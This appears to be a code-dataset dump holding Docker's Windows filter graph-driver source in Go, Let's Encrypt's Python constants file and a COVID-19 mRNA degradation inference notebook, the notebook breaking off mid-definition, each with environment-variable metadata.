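// FACILITY_WIN32 pattern, since 0x80070005 & 0x1fff0000 == 0x00070000, so
// win32FromHresult returns 0x80070005 & 0xffff == 0x5 (ERROR_ACCESS_DENIED).
// An HRESULT without the win32 facility bits is returned unchanged.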
// getFileSystemType obtains the type of a file system through GetVolumeInformation
// https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx
func getFileSystemType(drive string) (fsType string, hr error) {
var (
modkernel32 = windows.NewLazySystemDLL("kernel32.dll")
procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW")
buf = make([]uint16, 255)
size = windows.MAX_PATH + 1
)
if len(drive) != 1 {
hr = errors.New("getFileSystemType must be called with a drive letter")
return
}
drive += `:\`
n := uintptr(unsafe.Pointer(nil))
r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0)
if int32(r0) < 0 {
hr = syscall.Errno(win32FromHresult(r0))
}
fsType = windows.UTF16ToString(buf)
return
}
// String returns the string representation of a driver. This should match
// the name the graph driver has been registered with.
func (d *Driver) String() string {
return "windowsfilter"
}
// Status returns the status of the driver.
func (d *Driver) Status() [][2]string {
return [][2]string{
{"Windows", ""},
}
}
// panicIfUsedByLcow does exactly what it says.
// TODO @jhowardmsft - this is a temporary measure for the bring-up of
// Linux containers on Windows. It is a failsafe to ensure that the right
// graphdriver is used.
func panicIfUsedByLcow() {
if system.LCOWSupported() {
panic("inconsistency - windowsfilter graphdriver should not be used when in LCOW mode")
}
}
// Exists returns true if the given id is registered with this driver.
func (d *Driver) Exists(id string) bool {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return false
}
result, err := hcsshim.LayerExists(d.info, rID)
if err != nil {
return false
}
return result
}
// CreateReadWrite creates a layer that is writable for use as a container
// file system.
func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
panicIfUsedByLcow()
if opts != nil {
return d.create(id, parent, opts.MountLabel, false, opts.StorageOpt)
}
return d.create(id, parent, "", false, nil)
}
// Create creates a new read-only layer with the given id.
func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
panicIfUsedByLcow()
if opts != nil {
return d.create(id, parent, opts.MountLabel, true, opts.StorageOpt)
}
return d.create(id, parent, "", true, nil)
}
func (d *Driver) create(id, parent, mountLabel string, readOnly bool, storageOpt map[string]string) error {
rPId, err := d.resolveID(parent)
if err != nil {
return err
}
parentChain, err := d.getLayerChain(rPId)
if err != nil {
return err
}
var layerChain []string
if rPId != "" {
parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId)
if err != nil {
return err
}
if _, err := os.Stat(filepath.Join(parentPath, "Files")); err == nil {
// This is a legitimate parent layer (not the empty "-init" layer),
// so include it in the layer chain.
layerChain = []string{parentPath}
}
}
layerChain = append(layerChain, parentChain...)
if readOnly {
if err := hcsshim.CreateLayer(d.info, id, rPId); err != nil {
return err
}
} else {
var parentPath string
if len(layerChain) != 0 {
parentPath = layerChain[0]
}
if err := hcsshim.CreateSandboxLayer(d.info, id, parentPath, layerChain); err != nil {
return err
}
storageOptions, err := parseStorageOpt(storageOpt)
if err != nil {
return fmt.Errorf("Failed to parse storage options - %s", err)
}
if storageOptions.size != 0 {
if err := hcsshim.ExpandSandboxSize(d.info, id, storageOptions.size); err != nil {
return err
}
}
}
if _, err := os.Lstat(d.dir(parent)); err != nil {
if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil {
logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2)
}
return fmt.Errorf("Cannot create layer with missing parent %s: %s", parent, err)
}
if err := d.setLayerChain(id, layerChain); err != nil {
if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil {
logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2)
}
return err
}
return nil
}
// dir returns the absolute path to the layer.
func (d *Driver) dir(id string) string {
return filepath.Join(d.info.HomeDir, filepath.Base(id))
}
// Remove unmounts and removes the dir information.
func (d *Driver) Remove(id string) error {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return err
}
// This retry loop works around a bug in Windows (internal bug #9432268):
// if GetContainers fails with ErrVmcomputeOperationInvalidState, the error
// is transient, so retry until it succeeds.
var computeSystems []hcsshim.ContainerProperties
retryCount := 0
osv := system.GetOSVersion()
for {
// Get and terminate any template VMs that are currently using the layer.
// Note: It is unfortunate that we end up in the graphdrivers Remove() call
// for both containers and images, but the logic for template VMs is only
// needed for images - specifically we are looking to see if a base layer
// is in use by a template VM as a result of having started a Hyper-V
// container at some point.
//
// We have a retry loop for ErrVmcomputeOperationInvalidState and
// ErrVmcomputeOperationAccessIsDenied as there is a race condition
// in RS1 and RS2 building during enumeration when a silo is going away
// for example under it, in HCS. AccessIsDenied added to fix 30278.
//
// TODO @jhowardmsft - For RS3, we can remove the retries. Also consider
// using platform APIs (if available) to get this more succinctly. Also
// consider enhancing the Remove() interface to have context of why
// the remove is being called - that could improve efficiency by not
// enumerating compute systems during a remove of a container as it's
// not required.
computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{})
if err != nil {
if (osv.Build < 15139) &&
((err == hcsshim.ErrVmcomputeOperationInvalidState) || (err == hcsshim.ErrVmcomputeOperationAccessIsDenied)) {
if retryCount >= 500 {
break
}
retryCount++
time.Sleep(10 * time.Millisecond)
continue
}
return err
}
break
}
for _, computeSystem := range computeSystems {
if strings.Contains(computeSystem.RuntimeImagePath, id) && computeSystem.IsRuntimeTemplate {
container, err := hcsshim.OpenContainer(computeSystem.ID)
if err != nil {
return err
}
defer container.Close()
err = container.Terminate()
if hcsshim.IsPending(err) {
err = container.Wait()
} else if hcsshim.IsAlreadyStopped(err) {
err = nil
}
if err != nil {
return err
}
}
}
layerPath := filepath.Join(d.info.HomeDir, rID)
tmpID := fmt.Sprintf("%s-removing", rID)
tmpLayerPath := filepath.Join(d.info.HomeDir, tmpID)
if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) {
return err
}
if err := hcsshim.DestroyLayer(d.info, tmpID); err != nil {
logrus.Errorf("Failed to DestroyLayer %s: %s", id, err)
}
return nil
}
// Get returns the rootfs path for the id. This will mount the dir at its given path.
func (d *Driver) Get(id, mountLabel string) (string, error) {
panicIfUsedByLcow()
logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel)
var dir string
rID, err := d.resolveID(id)
if err != nil {
return "", err
}
if count := d.ctr.Increment(rID); count > 1 {
return d.cache[rID], nil
}
// Getting the layer paths must be done outside of the lock.
layerChain, err := d.getLayerChain(rID)
if err != nil {
d.ctr.Decrement(rID)
return "", err
}
if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
d.ctr.Decrement(rID)
return "", err
}
if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
d.ctr.Decrement(rID)
if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
logrus.Warnf("Failed to Deactivate %s: %s", id, err)
}
return "", err
}
mountPath, err := hcsshim.GetLayerMountPath(d.info, rID)
if err != nil {
d.ctr.Decrement(rID)
if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
logrus.Warnf("Failed to Unprepare %s: %s", id, err)
}
if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
logrus.Warnf("Failed to Deactivate %s: %s", id, err)
}
return "", err
}
d.cacheMu.Lock()
d.cache[rID] = mountPath
d.cacheMu.Unlock()
// If the layer has a mount path, use that. Otherwise, use the
// folder path.
if mountPath != "" {
dir = mountPath
} else {
dir = d.dir(id)
}
return dir, nil
}
// Put releases a reference to the layer taken by Get, unpreparing and
// deactivating it once the last reference is dropped.
func (d *Driver) Put(id string) error {
panicIfUsedByLcow()
logrus.Debugf("WindowsGraphDriver Put() id %s", id)
rID, err := d.resolveID(id)
if err != nil {
return err
}
if count := d.ctr.Decrement(rID); count > 0 {
return nil
}
d.cacheMu.Lock()
_, exists := d.cache[rID]
delete(d.cache, rID)
d.cacheMu.Unlock()
// If the cache was not populated, then the layer was left unprepared and deactivated
if !exists {
return nil
}
if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
return err
}
return hcsshim.DeactivateLayer(d.info, rID)
}
// Cleanup ensures the information the driver stores is properly removed.
// We use this opportunity to cleanup any -removing folders which may be
// still left if the daemon was killed while it was removing a layer.
func (d *Driver) Cleanup() error {
items, err := ioutil.ReadDir(d.info.HomeDir)
if err != nil {
if os.IsNotExist(err) {
return nil
}
return err
}
// Note we don't return an error below - it's possible the files
// are locked. However, next time around after the daemon exits,
// we will likely be able to clean up successfully. Instead we log
// warnings if there are errors.
for _, item := range items {
if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") {
if err := hcsshim.DestroyLayer(d.info, item.Name()); err != nil {
logrus.Warnf("Failed to cleanup %s: %s", item.Name(), err)
} else {
logrus.Infof("Cleaned up %s", item.Name())
}
}
}
return nil
}
// Diff produces an archive of the changes between the specified
// layer and its parent layer which may be "".
// The layer should be mounted when calling this function
func (d *Driver) Diff(id string, idMappings *idtools.IDMappings, parent string, parentMappings *idtools.IDMappings, mountLabel string) (_ io.ReadCloser, err error) {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return
}
layerChain, err := d.getLayerChain(rID)
if err != nil {
return
}
// Unprepare the layer so its contents can be exported; it is re-prepared when the returned stream is closed.
if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
return nil, err
}
prepare := func() {
if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
logrus.Warnf("Failed to Deactivate %s: %s", rID, err)
}
}
arch, err := d.exportLayer(rID, layerChain)
if err != nil {
prepare()
return
}
return ioutils.NewReadCloserWrapper(arch, func() error {
err := arch.Close()
prepare()
return err
}), nil
}
// Changes produces a list of changes between the specified layer
// and its parent layer. If parent is "", then all changes will be ADD changes.
// The layer should not be mounted when calling this function.
func (d *Driver) Changes(id string, idMappings *idtools.IDMappings, parent string, parentMappings *idtools.IDMappings, mountLabel string) ([]archive.Change, error) {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return nil, err
}
parentChain, err := d.getLayerChain(rID)
if err != nil {
return nil, err
}
if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
return nil, err
}
defer func() {
if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
logrus.Errorf("changes() failed to DeactivateLayer %s %s: %s", id, rID, err2)
}
}()
var changes []archive.Change
err = winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
r, err := hcsshim.NewLayerReader(d.info, id, parentChain)
if err != nil {
return err
}
defer r.Close()
for {
name, _, fileInfo, err := r.Next()
if err == io.EOF {
return nil
}
if err != nil {
return err
}
name = filepath.ToSlash(name)
if fileInfo == nil {
changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeDelete})
} else {
// Currently there is no way to distinguish an add from a modify.
changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeModify})
}
}
})
if err != nil {
return nil, err
}
return changes, nil
}
// ApplyDiff extracts the changeset from the given diff into the
// layer with the specified id and parent, returning the size of the
// new layer in bytes.
// The layer should not be mounted when calling this function
func (d *Driver) ApplyDiff(id string, idMappings *idtools.IDMappings, parent, mountLabel string, diff io.Reader) (int64, error) {
panicIfUsedByLcow()
var layerChain []string
if parent != "" {
rPId, err := d.resolveID(parent)
if err != nil {
return 0, err
}
parentChain, err := d.getLayerChain(rPId)
if err != nil {
return 0, err
}
parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId)
if err != nil {
return 0, err
}
layerChain = append(layerChain, parentPath)
layerChain = append(layerChain, parentChain...)
}
size, err := d.importLayer(id, diff, layerChain)
if err != nil {
return 0, err
}
if err = d.setLayerChain(id, layerChain); err != nil {
return 0, err
}
return size, nil
}
// DiffSize calculates the changes between the specified layer
// and its parent and returns the size in bytes of the changes
// relative to its base filesystem directory.
func (d *Driver) DiffSize(id string, idMappings *idtools.IDMappings, parent string, parentMappings *idtools.IDMappings, mountLabel string) (size int64, err error) {
panicIfUsedByLcow()
rPId, err := d.resolveID(parent)
if err != nil {
return
}
changes, err := d.Changes(id, idMappings, rPId, parentMappings, mountLabel)
if err != nil {
return
}
layerFs, err := d.Get(id, "")
if err != nil {
return
}
defer d.Put(id)
return archive.ChangesSize(layerFs, changes), nil
}
// Metadata returns custom driver information.
func (d *Driver) Metadata(id string) (map[string]string, error) {
panicIfUsedByLcow()
m := make(map[string]string)
m["dir"] = d.dir(id)
return m, nil
}
func writeTarFromLayer(r hcsshim.LayerReader, w io.Writer) error {
t := tar.NewWriter(w)
for {
name, size, fileInfo, err := r.Next()
if err == io.EOF {
break
}
if err != nil {
return err
}
if fileInfo == nil {
// Write a whiteout file.
hdr := &tar.Header{
Name: filepath.ToSlash(filepath.Join(filepath.Dir(name), archive.WhiteoutPrefix+filepath.Base(name))),
}
err := t.WriteHeader(hdr)
if err != nil {
return err
}
} else {
err = backuptar.WriteTarFileFromBackupStream(t, r, name, size, fileInfo)
if err != nil {
return err
}
}
}
return t.Close()
}
// exportLayer generates an archive from a layer based on the given ID.
func (d *Driver) exportLayer(id string, parentLayerPaths []string) (io.ReadCloser, error) {
archive, w := io.Pipe()
go func() {
err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
r, err := hcsshim.NewLayerReader(d.info, id, parentLayerPaths)
if err != nil {
return err
}
err = writeTarFromLayer(r, w)
cerr := r.Close()
if err == nil {
err = cerr
}
return err
})
w.CloseWithError(err)
}()
return archive, nil
}
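// Note: the tar stream above is produced by a background goroutine writing into
// an io.Pipe; any error from the layer reader is handed to the consumer via
// w.CloseWithError(err), so reads from the returned io.ReadCloser fail with
// that error rather than blocking indefinitely.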
// writeBackupStreamFromTarAndSaveMutatedFiles reads data from a tar stream and
// writes it to a backup stream, and also saves any files that will be mutated
// by the import layer process to a backup location.
func writeBackupStreamFromTarAndSaveMutatedFiles(buf *bufio.Writer, w io.Writer, t *tar.Reader, hdr *tar.Header, root string) (nextHdr *tar.Header, err error) {
var bcdBackup *os.File
var bcdBackupWriter *winio.BackupFileWriter
if backupPath, ok := mutatedFiles[hdr.Name]; ok {
bcdBackup, err = os.Create(filepath.Join(root, backupPath))
if err != nil {
return nil, err
}
defer func() {
cerr := bcdBackup.Close()
if err == nil {
err = cerr
}
}()
bcdBackupWriter = winio.NewBackupFileWriter(bcdBackup, false)
defer func() {
cerr := bcdBackupWriter.Close()
if err == nil {
err = cerr
}
}()
buf.Reset(io.MultiWriter(w, bcdBackupWriter))
} else {
buf.Reset(w)
}
defer func() {
ferr := buf.Flush()
if err == nil {
err = ferr
}
}()
return backuptar.WriteBackupStreamFromTarFile(buf, t, hdr)
}
func writeLayerFromTar(r io.Reader, w hcsshim.LayerWriter, root string) (int64, error) {
t := tar.NewReader(r)
hdr, err := t.Next()
totalSize := int64(0)
buf := bufio.NewWriter(nil)
for err == nil {
base := path.Base(hdr.Name)
if strings.HasPrefix(base, archive.WhiteoutPrefix) {
name := path.Join(path.Dir(hdr.Name), base[len(archive.WhiteoutPrefix):])
err = w.Remove(filepath.FromSlash(name))
if err != nil {
return 0, err
}
hdr, err = t.Next()
} else if hdr.Typeflag == tar.TypeLink {
err = w.AddLink(filepath.FromSlash(hdr.Name), filepath.FromSlash(hdr.Linkname))
if err != nil {
return 0, err
}
hdr, err = t.Next()
} else {
var (
name string
size int64
fileInfo *winio.FileBasicInfo
)
name, size, fileInfo, err = backuptar.FileInfoFromHeader(hdr)
if err != nil {
return 0, err
}
err = w.Add(filepath.FromSlash(name), fileInfo)
if err != nil {
return 0, err
}
hdr, err = writeBackupStreamFromTarAndSaveMutatedFiles(buf, w, t, hdr, root)
totalSize += size
}
}
if err != io.EOF {
return 0, err
}
return totalSize, nil
}
// importLayer adds a new layer to the tag and graph store based on the given data.
func (d *Driver) importLayer(id string, layerData io.Reader, parentLayerPaths []string) (size int64, err error) {
if !noreexec {
cmd := reexec.Command(append([]string{"docker-windows-write-layer", d.info.HomeDir, id}, parentLayerPaths...)...)
output := bytes.NewBuffer(nil)
cmd.Stdin = layerData
cmd.Stdout = output
cmd.Stderr = output
if err = cmd.Start(); err != nil {
return
}
if err = cmd.Wait(); err != nil {
return 0, fmt.Errorf("re-exec error: %v: output: %s", err, output)
}
return strconv.ParseInt(output.String(), 10, 64)
}
return writeLayer(layerData, d.info.HomeDir, id, parentLayerPaths...)
}
// writeLayerReexec is the re-exec entry point for writing a layer from a tar file
func writeLayerReexec() {
size, err := writeLayer(os.Stdin, os.Args[1], os.Args[2], os.Args[3:]...)
if err != nil {
fmt.Fprint(os.Stderr, err)
os.Exit(1)
}
fmt.Fprint(os.Stdout, size)
}
// writeLayer writes a layer from a tar file.
func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) {
err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege})
if err != nil {
return 0, err
}
if noreexec {
defer func() {
if err := winio.DisableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}); err != nil {
// This should never happen, but just in case when in debugging mode.
// See https://github.com/docker/docker/pull/28002#discussion_r86259241 for rationale.
panic("Failed to disabled process privileges while in non re-exec mode")
}
}()
}
info := hcsshim.DriverInfo{
Flavour: filterDriver,
HomeDir: home,
}
w, err := hcsshim.NewLayerWriter(info, id, parentLayerPaths)
if err != nil {
return 0, err
}
size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id))
if err != nil {
return 0, err
}
err = w.Close()
if err != nil {
return 0, err
}
return size, nil
}
// resolveID computes the layerID information based on the given id.
func (d *Driver) resolveID(id string) (string, error) {
content, err := ioutil.ReadFile(filepath.Join(d.dir(id), "layerID"))
if os.IsNotExist(err) {
return id, nil
} else if err != nil {
return "", err
}
return string(content), nil
}
// setID stores the layer ID on disk.
func (d *Driver) setID(id, altID string) error {
return ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600)
}
// getLayerChain returns the layer chain information.
func (d *Driver) getLayerChain(id string) ([]string, error) {
jPath := filepath.Join(d.dir(id), "layerchain.json")
content, err := ioutil.ReadFile(jPath)
if os.IsNotExist(err) {
return nil, nil
} else if err != nil {
return nil, fmt.Errorf("Unable to read layerchain file - %s", err)
}
var layerChain []string
err = json.Unmarshal(content, &layerChain)
if err != nil {
return nil, fmt.Errorf("Failed to unmarshall layerchain json - %s", err)
}
return layerChain, nil
}
// setLayerChain stores the layer chain information in disk.
func (d *Driver) setLayerChain(id string, chain []string) error {
content, err := json.Marshal(&chain)
if err != nil {
return fmt.Errorf("Failed to marshall layerchain json - %s", err)
}
jPath := filepath.Join(d.dir(id), "layerchain.json")
err = ioutil.WriteFile(jPath, content, 0600)
if err != nil {
return fmt.Errorf("Unable to write layerchain file - %s", err)
}
return nil
}
type fileGetCloserWithBackupPrivileges struct {
path string
}
func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser, error) {
if backupPath, ok := mutatedFiles[filename]; ok {
return os.Open(filepath.Join(fg.path, backupPath))
}
var f *os.File
// Open the file while holding the Windows backup privilege. This ensures that the
// file can be opened even if the caller does not actually have access to it according
// to the security descriptor. Also use sequential file access to avoid depleting the
// standby list - Microsoft VSO Bug Tracker #9900466
err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
path := longpath.AddPrefix(filepath.Join(fg.path, filename))
p, err := windows.UTF16FromString(path)
if err != nil {
return err
}
const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN
h, err := windows.CreateFile(&p[0], windows.GENERIC_READ, windows.FILE_SHARE_READ, nil, windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS|fileFlagSequentialScan, 0)
if err != nil {
return &os.PathError{Op: "open", Path: path, Err: err}
}
f = os.NewFile(uintptr(h), path)
return nil
})
return f, err
}
func (fg *fileGetCloserWithBackupPrivileges) Close() error {
return nil
}
// DiffGetter returns a FileGetCloser that can read files from the directory that
// contains files for the layer differences. Used for direct access for tar-split.
func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) {
panicIfUsedByLcow()
id, err := d.resolveID(id)
if err != nil {
return nil, err
}
return &fileGetCloserWithBackupPrivileges{d.dir(id)}, nil
}
// AdditionalImageStores returns additional image stores supported by the driver
func (d *Driver) AdditionalImageStores() []string {
return nil
}
// UpdateLayerIDMap changes ownerships in the layer's filesystem tree from
// matching those in toContainer to matching those in toHost.
func (d *Driver) UpdateLayerIDMap(id string, toContainer, toHost *idtools.IDMappings, mountLabel string) error {
return fmt.Errorf("windows doesn't support changing ID mappings")
}
type storageOptions struct {
size uint64
}
func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) {
options := storageOptions{}
// Read size to change the block device size per container.
for key, val := range storageOpt {
key := strings.ToLower(key)
switch key {
case "size":
size, err := units.RAMInBytes(val)
if err != nil {
return nil, err
}
options.size = uint64(size)
default:
return nil, fmt.Errorf("Unknown storage option: %s", key)
}
}
return &options, nil
}
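// Example (sketch): parseStorageOpt(map[string]string{"size": "20G"}) returns
// options.size == 21474836480, because go-units RAMInBytes parses "20G" as
// 20 GiB (20 * 1024^3); any key other than "size" is rejected with an error.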
|
[
"\"DOCKER_WINDOWSFILTER_NOREEXEC\""
] |
[] |
[
"DOCKER_WINDOWSFILTER_NOREEXEC"
] |
[]
|
["DOCKER_WINDOWSFILTER_NOREEXEC"]
|
go
| 1 | 0 | |
letsencrypt/constants.py
|
"""Let's Encrypt constants."""
import os
import logging
from acme import challenges
SETUPTOOLS_PLUGINS_ENTRY_POINT = "letsencrypt.plugins"
"""Setuptools entry point group name for plugins."""
CLI_DEFAULTS = dict(
config_files=[
"/etc/letsencrypt/cli.ini",
# http://freedesktop.org/wiki/Software/xdg-user-dirs/
os.path.join(os.environ.get("XDG_CONFIG_HOME", "~/.config"),
"letsencrypt", "cli.ini"),
],
verbose_count=-(logging.WARNING // 10),  # integer division keeps this an int on Python 3
server="https://acme-staging.api.letsencrypt.org/directory",
rsa_key_size=2048,
rollback_checkpoints=1,
config_dir="/etc/letsencrypt",
work_dir="/var/lib/letsencrypt",
logs_dir="/var/log/letsencrypt",
no_verify_ssl=False,
tls_sni_01_port=challenges.TLSSNI01Response.PORT,
auth_cert_path="./cert.pem",
auth_chain_path="./chain.pem",
strict_permissions=False,
)
"""Defaults for CLI flags and `.IConfig` attributes."""
RENEWER_DEFAULTS = dict(
renewer_enabled="yes",
renew_before_expiry="30 days",
deploy_before_expiry="20 days",
)
"""Defaults for renewer script."""
EXCLUSIVE_CHALLENGES = frozenset([frozenset([
challenges.TLSSNI01, challenges.HTTP01])])
"""Mutually exclusive challenges."""
ENHANCEMENTS = ["redirect", "http-header", "ocsp-stapling", "spdy"]
"""List of possible :class:`letsencrypt.interfaces.IInstaller`
enhancements.
List of expected options parameters:
- redirect: None
- http-header: TODO
- ocsp-stapling: TODO
- spdy: TODO
"""
ARCHIVE_DIR = "archive"
"""Archive directory, relative to `IConfig.config_dir`."""
CONFIG_DIRS_MODE = 0o755
"""Directory mode for ``.IConfig.config_dir`` et al."""
ACCOUNTS_DIR = "accounts"
"""Directory where all accounts are saved."""
BACKUP_DIR = "backups"
"""Directory (relative to `IConfig.work_dir`) where backups are kept."""
CSR_DIR = "csr"
"""See `.IConfig.csr_dir`."""
IN_PROGRESS_DIR = "IN_PROGRESS"
"""Directory used before a permanent checkpoint is finalized (relative to
`IConfig.work_dir`)."""
KEY_DIR = "keys"
"""Directory (relative to `IConfig.config_dir`) where keys are saved."""
LIVE_DIR = "live"
"""Live directory, relative to `IConfig.config_dir`."""
TEMP_CHECKPOINT_DIR = "temp_checkpoint"
"""Temporary checkpoint directory (relative to `IConfig.work_dir`)."""
RENEWAL_CONFIGS_DIR = "renewal"
"""Renewal configs directory, relative to `IConfig.config_dir`."""
RENEWER_CONFIG_FILENAME = "renewer.conf"
"""Renewer config file name (relative to `IConfig.config_dir`)."""
|
[] |
[] |
[
"XDG_CONFIG_HOME"
] |
[]
|
["XDG_CONFIG_HOME"]
|
python
| 1 | 0 | |
covid-19_inference.py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import time
import warnings
warnings.filterwarnings('ignore')
import pandas as pd, numpy as np
import math, json, gc, random, os, sys
import torch
import logging
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as data
from sklearn.model_selection import train_test_split
from catalyst.dl import SupervisedRunner
from catalyst.contrib.dl.callbacks import WandbLogger
from contextlib import contextmanager
from catalyst.dl.callbacks import AccuracyCallback, F1ScoreCallback, OptimizerCallback
#from pytorch_memlab import profile, MemReporter
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# In[2]:
def set_seed(seed: int):
random.seed(seed)
np.random.seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed) # type: ignore
torch.backends.cudnn.deterministic = True # type: ignore
torch.backends.cudnn.benchmark = True # type: ignore  # note: benchmark=True favors speed over strict determinism
# In[3]:
set_seed(2020)
# In[4]:
test = pd.read_json('/kaggle/input/stanford-covid-vaccine/test.json', lines=True)
samplesub= pd.read_csv('/kaggle/input/stanford-covid-vaccine/sample_submission.csv')
# In[5]:
bpp_max=[]
bpp_mean =[]
id = test.id.values
for i in id:
probability = np.load('../input/stanford-covid-vaccine'+'/bpps/%s.npy'%i)
bpp_max.append(probability.max(-1).tolist())
bpp_mean.append(probability.mean(-1).tolist())
test['bpp_max']=bpp_max
test['bpp_mean']=bpp_mean
# In[6]:
test_public=test[test['seq_length']==107]
test_private=test[test['seq_length']==130]
# In[7]:
test_public_x=test_public.loc[:,['id','sequence','structure','predicted_loop_type','bpp_max','bpp_mean']]
test_private_x=test_private.loc[:,['id','sequence','structure','predicted_loop_type','bpp_max','bpp_mean']]
# The private set is too large to fit on the GPU, so split it in half.
test_private_x1,test_private_x2=train_test_split(test_private_x,test_size=0.5)
# In[8]:
token2int = {x:i for i, x in enumerate('().ACGUBEHIMSX')}
def preprocess_inputs_public(df, cols=['sequence', 'structure', 'predicted_loop_type']):
base_fea= np.transpose(
np.array(
df[cols]
.applymap(lambda seq: [token2int[x] for x in seq])
.values
.tolist()
),
(0, 2, 1)
)
bpps_max_fea = np.array(test_public_x['bpp_max'].to_list())[:,:,np.newaxis]
bpps_mean_fea = np.array(test_public_x['bpp_mean'].to_list())[:,:,np.newaxis]
return np.concatenate([base_fea,bpps_max_fea,bpps_mean_fea], 2)
def preprocess_inputs_private1(df, cols=['sequence', 'structure', 'predicted_loop_type']):
base_fea= np.transpose(
np.array(
df[cols]
.applymap(lambda seq: [token2int[x] for x in seq])
.values
.tolist()
),
(0, 2, 1)
)
bpps_max_fea = np.array(test_private_x1['bpp_max'].to_list())[:,:,np.newaxis]
bpps_mean_fea = np.array(test_private_x1['bpp_mean'].to_list())[:,:,np.newaxis]
return np.concatenate([base_fea,bpps_max_fea,bpps_mean_fea], 2)
def preprocess_inputs_private2(df, cols=['sequence', 'structure', 'predicted_loop_type']):
base_fea= np.transpose(
np.array(
df[cols]
.applymap(lambda seq: [token2int[x] for x in seq])
.values
.tolist()
),
(0, 2, 1)
)
bpps_max_fea = np.array(test_private_x2['bpp_max'].to_list())[:,:,np.newaxis]
bpps_mean_fea = np.array(test_private_x2['bpp_mean'].to_list())[:,:,np.newaxis]
return np.concatenate([base_fea,bpps_max_fea,bpps_mean_fea], 2)
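# Possible consolidation (sketch only, not used below): the three preprocess
# helpers above differ only in which dataframe supplies the bpp features, so a
# single function taking that dataframe explicitly would cover all cases:
# def preprocess_inputs(df, cols=['sequence', 'structure', 'predicted_loop_type']):
#     base_fea = np.transpose(
#         np.array(df[cols].applymap(lambda seq: [token2int[x] for x in seq]).values.tolist()),
#         (0, 2, 1))
#     bpps_max_fea = np.array(df['bpp_max'].to_list())[:, :, np.newaxis]
#     bpps_mean_fea = np.array(df['bpp_mean'].to_list())[:, :, np.newaxis]
#     return np.concatenate([base_fea, bpps_max_fea, bpps_mean_fea], 2)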
# In[9]:
test_public_inputs = torch.from_numpy(preprocess_inputs_public(test_public_x)).to(device).float()
test_private_inputs1 = torch.from_numpy(preprocess_inputs_private1(test_private_x1)).to(device).float()
test_private_inputs2 = torch.from_numpy(preprocess_inputs_private2(test_private_x2)).to(device).float()
# In[10]:
#print('train_inputs:{}\nval_inputs:{}\ntrain_labels:{}\nval_labels:{}'.format(train_inputs.shape,val_inputs.shape,train_outputs.shape,val_outputs.shape))
# In[11]:
class LSTM_model(nn.Module):
def __init__(
self, seq_len=107, pred_len=68, dropout=0.5, embed_dim=100, hidden_dim=1024, hidden_layers=2
):
super(LSTM_model, self).__init__()
self.pred_len = pred_len
self.embeding = nn.Embedding(num_embeddings=len(token2int), embedding_dim=embed_dim)
self.lstm = nn.LSTM(
input_size=embed_dim * 3+2,
hidden_size=hidden_dim,
num_layers=hidden_layers,
dropout=dropout,
bidirectional=True,
batch_first=True,
)
self.linear = nn.Linear(hidden_dim * 2, 5)
def forward(self, seqs):
embed = self.embeding(seqs[:,:,0:3].long())
reshaped = torch.reshape(embed, (-1, embed.shape[1], embed.shape[2] * embed.shape[3]))
reshaped= torch.cat((reshaped,seqs[:,:,3:5]),2)
output, hidden = self.lstm(reshaped)
truncated = output[:, : self.pred_len, :]
out = self.linear(truncated)
return out
# In[12]:
class GRU_model(nn.Module):
def __init__(
self, seq_len=107, pred_len=68, dropout=0.5, embed_dim=100, hidden_dim=1024, hidden_layers=2
):
super(GRU_model, self).__init__()
self.pred_len = pred_len
self.embeding = nn.Embedding(num_embeddings=len(token2int), embedding_dim=embed_dim)
